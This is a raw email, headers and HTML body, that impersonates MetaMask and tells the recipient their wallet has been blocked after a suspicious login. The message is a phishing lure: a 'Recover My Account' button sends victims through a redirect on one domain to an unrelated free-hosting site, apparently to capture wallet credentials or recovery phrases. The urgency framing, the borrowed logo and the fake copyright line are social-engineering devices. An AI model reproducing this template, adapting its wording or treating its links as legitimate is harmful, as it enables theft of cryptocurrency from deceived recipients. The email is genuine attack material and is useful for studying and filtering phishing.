Return-Path: <info@little-bigshots.com>
Delivered-To: info@pspmotor.com
Received: from d5.my-control-panel.com
	by d5.my-control-panel.com with LMTP
	id wMUuLQV7UGdajzAAJCSu9w
	(envelope-from <info@little-bigshots.com>)
	for <info@pspmotor.com>; Wed, 04 Dec 2024 16:53:41 +0100
Return-path: <info@little-bigshots.com>
Envelope-to: info@pspmotor.com
Delivery-date: Wed, 04 Dec 2024 16:53:41 +0100
Received: from host.dnshost360.com ([79.142.64.203])
	by d5.my-control-panel.com with esmtps  (TLS1.2) tls TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
	(Exim 4.97.1)
	(envelope-from <info@little-bigshots.com>)
	id 1tIrh7-0000000EGzi-2lN8
	for info@pspmotor.com;
	Wed, 04 Dec 2024 16:53:41 +0100
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed;
	d=little-bigshots.com; s=default; h=Content-Transfer-Encoding:Content-Type:
	MIME-Version:Message-ID:Date:Subject:To:From:Sender:Reply-To:Cc:Content-ID:
	Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc
	:Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe:
	List-Subscribe:List-Post:List-Owner:List-Archive;
	bh=KWnohl306q0qrGhSzYfzMwSdjxErBOcnj8BVxRwdCQ8=; b=v8rkQCKbOl6nQh9j0f9jbUjFrE
	GKNUve3mmPeOdmT3YiFktGhg8S1xNWMx2o90PYm279s6lR/bMTVQgGndwZCPbGMZ1teJTWLVhsjLD
	sZoSdJPE8qNC+VO2XPi18pc7Uxz0YXGt5CYpXHj6X/Bv9xSX644sldMNVAGjXPvrxyyFBIXU0Huw8
	0D2yndiNZYevTQsNxCEAI+SZyMhWj6g9XYHs8do/qP9aClNQXygyY2WyiISbvWk5QFkm5OobAuSkX
	BsHC9ug5/3GXF+aBVaNRNCyiLiY5CfF4qVhARSWxhme4hlK8xAMxjgD0pYX7/9X2IgiTMJqbFoE1j
	QoD2TKog==;
Received: from [48.217.56.125] (port=53888)
	by host.dnshost360.com with esmtpsa  (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
	(Exim 4.96.2)
	(envelope-from <info@little-bigshots.com>)
	id 1tIrgy-0000R1-0O
	for info@pspmotor.com;
	Wed, 04 Dec 2024 16:53:37 +0100
From: "=?UTF-8?B?TWV0YU1hc2s=?=" <info@little-bigshots.com>
To: info@pspmotor.com
Subject: =?UTF-8?B?WW91ciBNZXRhTWFzayB3YWxsZXQgd2lsbCBiZSBzdXNwZW5kZWQu?=
Date: 4 Dec 2024 15:53:38 +0000
Message-ID: <20241204155337.8B6E4181AD4C9C24@little-bigshots.com>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - host.dnshost360.com
X-AntiAbuse: Original Domain - pspmotor.com
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - little-bigshots.com
X-Get-Message-Sender-Via: host.dnshost360.com: authenticated_id: info@little-bigshots.com
X-Authenticated-Sender: host.dnshost360.com: info@little-bigshots.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 

<!DOCTYPE html>

<html lang=3D"en"><head>
<meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge">
<meta charset=3D"UTF-8">
    <meta name=3D"viewport" content=3D"width=3Ddevice-width, initial-scale=
=3D1.0">
    <title>Important Notice</title>
    <style>
        body {
            font-family: 'Helvetica Neue', Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
        }

        .email-container {
            max-width: 600px;
            margin: 20px auto;
            background-color: #ffffff;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.05);
        }

        .ledger-logo {
            display: block;
            margin: 0 auto 10px;
            max-width: 200px;
        }

        .email-header {
            text-align: center;
            border-bottom: 1px solid #e8e8e8;
            padding-bottom: 10px;
            margin-bottom: 20px;
        }

        .email-content p {
            line-height: 1.7;
            color: #333;
            font-size: 16px;
            margin: 16px 0;
        }

        .alert-text {
            background-color: #FFEBEB;
            padding: 10px;
            margin: 20px 0;
            border: 1px solid #FF5300;
            border-radius: 5px;
            color: #d93a00;
        }

        .recover-button {
            display: block;
            width: 100%;
            max-width: 250px;
            margin: 30px auto;
            text-align: center;
            padding: 10px 15px;
            background-color: #FF5300;
            color: #ffffff;
            text-decoration: none;
            border-radius: 5px;
            font-weight: 600;
            letter-spacing: 0.5px;
            transition: background-color 0.3s;
        }

        .recover-button:hover, .recover-button:focus {
            background-color: #d93a00;
        }

        .footer-text {
            font-size: 12px;
            color: #888;
            text-align: center;
            margin-top: 40px;
        }

        /* Media Queries for Responsiveness */
        @media screen and (max-width: 640px) {
            .email-container {
                padding: 15px;
            }

            .ledger-logo {
                max-width: 150px;
            }

            .email-header h2 {
                font-size: 20px;
            }
        }

    </style>
</head>

<body style=3D"font-family: 'Helvetica Neue', Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0">
    <div style=3D"max-width: 600px;
            margin: 20px auto;
            background-color: #ffffff;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.05)" class=3D"email-cont=
ainer">
        <div style=3D"text-align: center;
            border-bottom: 1px solid #e8e8e8;
            padding-bottom: 10px;
            margin-bottom: 20px" class=3D"email-header">

            <h2><img width=3D"222" height=3D"122" align=3D"middle" style=3D=
"border-color: rgb(0, 0, 0);" src=3D"https://1000logos.net/wp-content/uploa=
ds/2022/05/MetaMask-Emblem.png"></h2>
          <h2><br></h2>
        </div>
        <div class=3D"email-content">
            <p style=3D"line-height: 1.7;
            color: #333;
            font-size: 16px;
            margin: 16px 0">Dear Customer,</p>
            <p style=3D"line-height: 1.7;
            color: #333;
            font-size: 16px;
            margin: 16px 0">We noticed that someone just tried to log in to=
 your&nbsp;MetaMask from location you have not used before, so we want to m=
ake sure it's really you.</p>
            <div style=3D"background-color: #FFEBEB;
            padding: 10px;
            margin: 20px 0;
            border: 1px solid #FF5300;
            border-radius: 5px;
            color: #d93a00" class=3D"alert-text">
                Your account and your wallet have been temporarily blocked =
to prevent you from losing&nbsp;your assets.
            </div>
            <h3>How can I recover my account?</h3>
            <ol>
                <li>Click and follow the instructions to recover your accou=
nt and unblock it.</li>
                <li>After completing the process, enable Two-Factor Authent=
ication.</li>
            </ol>
            <a style=3D"display: block;
            width: 100%;
            max-width: 250px;
            margin: 30px auto;
            text-align: center;
            padding: 10px 15px;
            background-color: #FF5300;
            color: #ffffff;
            text-decoration: none;
            border-radius: 5px;
            font-weight: 600;
            letter-spacing: 0.5px;
            transition: background-color 0.3s" class=3D"recover-button" hre=
f=3D"https://www.plivamed.net/auth/?url=3Dhttps://carisonutypm.wuaze.com/">=
Recover My Account</a>
        </div>
        <div style=3D"font-size: 12px;
            color: #888;
            text-align: center;
            margin-top: 40px" class=3D"footer-text">
            &copy; 2024 MetaMask. All rights reserved.
        </div>
    </div>



</body></html>
